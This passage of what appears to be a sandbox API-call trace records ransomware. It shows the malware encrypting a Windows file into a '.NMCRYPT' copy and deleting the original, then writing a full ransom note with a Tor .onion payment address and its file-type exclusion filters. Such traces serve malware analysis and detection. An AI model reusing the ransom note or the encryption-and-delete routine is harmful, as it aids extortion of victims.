hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.514] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.515] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0158.516] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0158.516] CryptCreateHash (in: hProv=0x8e3bb0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0158.516] CryptHashData (hHash=0x9ad678, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.516] CryptDeriveKey (in: hProv=0x8e3bb0, Algid=0x6610, hBaseData=0x9ad678, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad378) returned 1 [0158.516] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0158.516] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0158.516] wcslen (_String="\\\\?\\") returned 0x4 [0158.516] CryptDuplicateKey (in: hKey=0x9ad378, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad138) returned 1 [0158.516] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0158.517] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0158.517] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=924) returned 1 [0158.517] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0158.517] ReadFile (in: hFile=0x1624, lpBuffer=0x607e48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e48*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0158.518] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0158.518] GetLastError () returned 0x0 [0158.518] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0158.550] ReadFile (in: hFile=0x1624, lpBuffer=0x607e48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e48*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0158.551] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0158.551] GetLastError () returned 0x0 [0158.551] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0158.551] ReadFile (in: hFile=0x1624, lpBuffer=0x607e48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e48*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0158.551] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0158.551] GetLastError () returned 0x0 [0158.551] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0158.551] ReadFile (in: hFile=0x1624, lpBuffer=0x607e48, nNumberOfBytesToRead=0x9c, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e48*, lpNumberOfBytesRead=0x2d7dc80*=0x9c, lpOverlapped=0x0) returned 1 [0158.551] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x9c, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xa0) returned 1 [0158.551] GetLastError () returned 0x0 [0158.551] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0xa0, lpOverlapped=0x0) returned 1 [0158.551] ReadFile (in: hFile=0x1624, lpBuffer=0x607e48, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e48*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0158.551] WriteFile (in: hFile=0x588, lpBuffer=0x607e48*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607e48*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0158.551] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml")) returned 0x20 [0158.551] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", dwFileAttributes=0x20) returned 0 [0158.552] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 1 [0158.552] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml")) returned 0 [0158.552] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" [0158.552] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred") returned 1 [0158.552] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\.xXDE9B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\.xxde9b.tmp")) returned 0xde9b [0158.553] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\.xXDE9B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\.xxde9b.tmp"), dwFlags=0x1) returned 0 [0158.553] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\.xXDE9B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\.xxde9b.tmp")) returned 1 [0158.553] CryptDestroyKey (hKey=0x9ad138) returned 1 [0158.553] wcslen (_String="OK") returned 0x2 [0158.553] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.554] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.554] CryptDestroyKey (hKey=0x9ad378) returned 1 [0158.554] CryptDestroyHash (hHash=0x9ad678) returned 1 [0158.554] CryptReleaseContext (hProv=0x8e3bb0, dwFlags=0x0) returned 1 [0158.554] FindNextFileW (in: hFindFile=0x9ad738, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0 [0158.554] GetLastError () returned 0x12 [0158.554] FindClose (in: hFindFile=0x9ad738 | out: hFindFile=0x9ad738) returned 1 [0158.554] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0158.554] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0158.555] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0158.555] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0158.555] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.555] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.555] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0158.555] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.555] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*.exe") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*.dll") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*.lnk") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*.bat") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*.ini") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*.msi") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*.scf") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*pagefile.sys*") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*NTUSER.DAT*") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*AppData*") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*\\winrar\\*") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common 